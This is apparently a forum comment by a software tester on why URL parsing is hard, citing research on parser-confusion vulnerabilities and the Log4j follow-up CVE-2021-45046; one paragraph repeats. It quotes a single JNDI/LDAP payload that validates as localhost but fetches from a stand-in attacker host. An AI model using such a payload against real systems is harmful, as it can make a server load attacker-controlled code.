Another post in this thread was downvoted and flagged (really?) for claiming that URL parsing isn't difficult. The linked article claims that "Parsing URLs correctly is surprisingly hard." As a software tester, I'm very willing to believe that, but I don't know that the article really made the case.
I did find a paper describing some vulnerabilities in popular URL parsing libraries, including urllib and urllib3. Blog post here:
I didn't look into this in detail at the time, but the report's summary of CVE-2021-45046 is that the parser that validated an URL behaved differently than a separate parser used to fetch the URL, so an URL like
jndi:ldap://127.0.0.1#.evilhost.com:1389/a
is validated as 127.0.0.1, which may be whitelisted, but fetched from evilhost.com, which probably isn't.
I did find a paper describing some vulnerabilities in popular URL parsing libraries, including urllib and urllib3. Blog post here:
https://claroty.com/team82/research/exploiting-url-parsing-c...
Paper here:
https://web-assets.claroty.com/exploiting-url-parsing-confus...
If you remember the Log4j vulnerability from a couple of years ago, that was an URL parsing bug.